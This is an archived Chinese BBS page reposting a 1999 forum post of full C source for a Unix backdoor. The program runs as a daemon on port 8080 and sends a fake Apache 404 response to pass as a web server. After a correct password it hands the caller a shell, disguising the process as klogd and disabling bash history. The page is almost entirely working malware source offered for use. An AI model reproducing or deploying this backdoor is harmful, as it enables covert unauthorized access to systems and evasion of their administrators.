📄 366.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="367.htm">下一篇</a>]
<hr><p align="left"><small>伪装成http进程的Unix后门 <br>
---------------------------------------------------------------------------- <br>
---- <br>
黑脸 于 99-11-16 11:56:54 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安全 <br>
: <br>
伪装成http进程的Unix后门 <br>
/* <br>
* Generic backdoor. (ab)use for your own fun and profit.. but behave.. <br>
* <br>
* C.P. (fygrave@tigerteam.net) <br>
* Nov 12 10:12:09 KGT 1998. Went public 1999. <br>
*/ <br>
#define _XOPEN_SOURCE <br>
#include <stdio.h> <br>
#include <unistd.h> <br>
#include <stdlib.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <sys/wait.h> <br>
#include <netinet/in.h> <br>
#include <signal.h> <br>
#include <string.h> <br>
#define DEFAULT_PORT 8080 <br>
/* des crypted password */ <br>
#define PWD "QXtGlGiFUEeKY" <br>
void sig_hand(int sig) { <br>
int status; <br>
/* rip off children */ <br>
while(waitpid(-1,&status,WNOHANG)>0); <br>
} <br>
/* we hide ourselves as httpd daemon */ <br>
char *erro= <br>
"HTTP/1.1 404 Not Found\n" <br>
"Date: Mon, 08 Dec 1998 23:17:15 GMT\n" <br>
"Server: Apache/1.3.X (Unix)\n" <br>
"Connection: close\n" <br>
"Content-Type: text/html\n\n" <br>
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n" <br>
"<HTML><HEAD>\n" <br>
"<TITLE>404 Not Found</TITLE>\n" <br>
"</HEAD><BODY>\n" <br>
"<H1>Not Found</H1>\n" <br>
"The requested URL /loha was not found on this server.<P>\n" <br>
"<HR>\n" <br>
"<ADDRESS>Apache/1.3.X Server at yourserver Port 80</ADDRESS>\n" <br>
"</BODY></HTML>\n"; <br>
void my_error(int fd) { <br>
write(fd,erro,strlen(erro)); <br>
} <br>
int main(int argc,char **argv) <br>
{ <br>
char *name[3]; <br>
char *env[2]; <br>
char *execname; <br>
int fd,fd2,fromlen; <br>
int port; <br>
struct sockaddr_in serv; <br>
char *crypted=PWD; <br>
unsigned char *ptr; <br>
char pass[9]; <br>
port=DEFAULT_PORT; <br>
if (argc>1 && atoi(argv[1])) port=atoi(argv[1]); <br>
#ifndef DEBUG <br>
if (fork()) exit(1); <br>
close(0); <br>
close(1); <br>
close(2); <br>
chdir("/"); <br>
setsid(); <br>
#endif <br>
signal(SIGCHLD,sig_hand); <br>
if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { <br>
#ifdef DEBUG <br>
perror("socket"); <br>
#endif <br>
exit(1); <br>
} <br>
serv.sin_addr.s_addr=0; <br>
serv.sin_port=htons(port); <br>
serv.sin_family=AF_INET; <br>
if(bind(fd,(struct sockaddr *)&serv,16)) { <br>
#ifdef DEBUG <br>
perror("bind"); <br>
#endif <br>
exit(1); <br>
} <br>
if(listen(fd,5)) { <br>
#ifdef DEBUG <br>
perror("listen"); <br>
exit(1); <br>
#endif <br>
} <br>
for(;;) { <br>
fromlen=16; /*(sizeof(struct sockaddr)*/ <br>
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); <br>
if (fd2<0) continue; <br>
if (fork()) { /* parent */ <br>
close(fd2); <br>
} else { <br>
close(fd); <br>
bzero(pass,9); <br>
read(fd2,pass,8); <br>
for(ptr=pass;*ptr!=0;ptr++) <br>
if(*ptr<32) *ptr=0; <br>
if (strcmp(crypt(pass,crypted),crypted)) { <br>
my_error(fd2); <br>
exit(1); <br>
} <br>
dup2(fd2,0); <br>
dup2(fd2,1); <br>
dup2(fd2,2); <br>
execname="/bin/sh"; <br>
name[0]="/sbin/klogd"; <br>
/* gives somewhat nicer appearence */ <br>
name[1]="-i"; <br>
name[2]=NULL; <br>
/* if the actual /bin/sh is bash <br>
* we need this to get rid saving stuff into <br>
* .bash_history file <br>
*/ <br>
env[0]="HISTFILE=/dev/null"; <br>
env[1]=NULL; <br>
execve(name[0],name,env); <br>
exit(1); <br>
} <br>
} <br>
} <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="311.htm">上一层</a>][<a href="367.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -